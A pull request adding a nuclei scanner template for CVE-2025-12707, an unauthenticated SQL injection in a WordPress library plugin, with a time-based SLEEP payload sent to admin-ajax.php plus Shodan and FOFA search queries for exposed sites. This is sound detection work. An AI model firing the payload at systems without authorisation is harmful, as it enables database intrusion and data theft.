### PR TITLE
Add CVE-2025-12707: WordPress Library Management System SQL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-12707.yaml
+++ b/http/cves/2025/CVE-2025-12707.yaml
@@ -1,0 +1,66 @@
+id: CVE-2025-12707
+
+info:
+  name: WordPress Library Management System <= 3.2.1 - Unauthenticated SQL Injection
+  author: optimus-fulcria
+  severity: high
+  description: |
+    The Library Management System plugin for WordPress is vulnerable to SQL Injection via the 'bid' parameter in all versions up to, and including, 3.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  impact: |
+    Unauthenticated attackers can execute arbitrary SQL queries through time-based blind SQL injection in the bid parameter, leading to extraction of sensitive database information including user credentials and personal data.
+  remediation: |
+    Update the Library Management System plugin to version 3.3 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-12707
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/70b2f35d-c58b-480c-a893-e970daca5f3f?source=cve
+    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3447479%40library-management-system&new=3447479%40library-management-system
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2025-12707
+    cwe-id: CWE-89
+  metadata:
+    verified: false
+    max-request: 2
+    vendor: developer-flavor
+    product: library-management-system
+    framework: wordpress
+    shodan-query: http.component:"WordPress"
+    fofa-query: body="/wp-content/plugins/library-management-system/"
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,unauth,library-management-system
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        @timeout: 10s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=lms_book_details&bid=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'duration < 5'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 15s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=lms_book_details&bid=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration >= 6'
+          - 'status_code == 200'
+        condition: and


### PR DESCRIPTION
## Summary
- Adds nuclei template for CVE-2025-12707
- WordPress Library Management System plugin <= 3.2.1 is vulnerable to unauthenticated SQL injection via the `bid` parameter
- CVSS 7.5 (High), CWE-89
- Uses time-based blind SQL injection detection with baseline and injection requests via flow control

## References
- https://nvd.nist.gov/vuln/detail/CVE-2025-12707
- https://www.wordfence.com/threat-intel/vulnerabilities/id/70b2f35d-c58b-480c-a893-e970daca5f3f?source=cve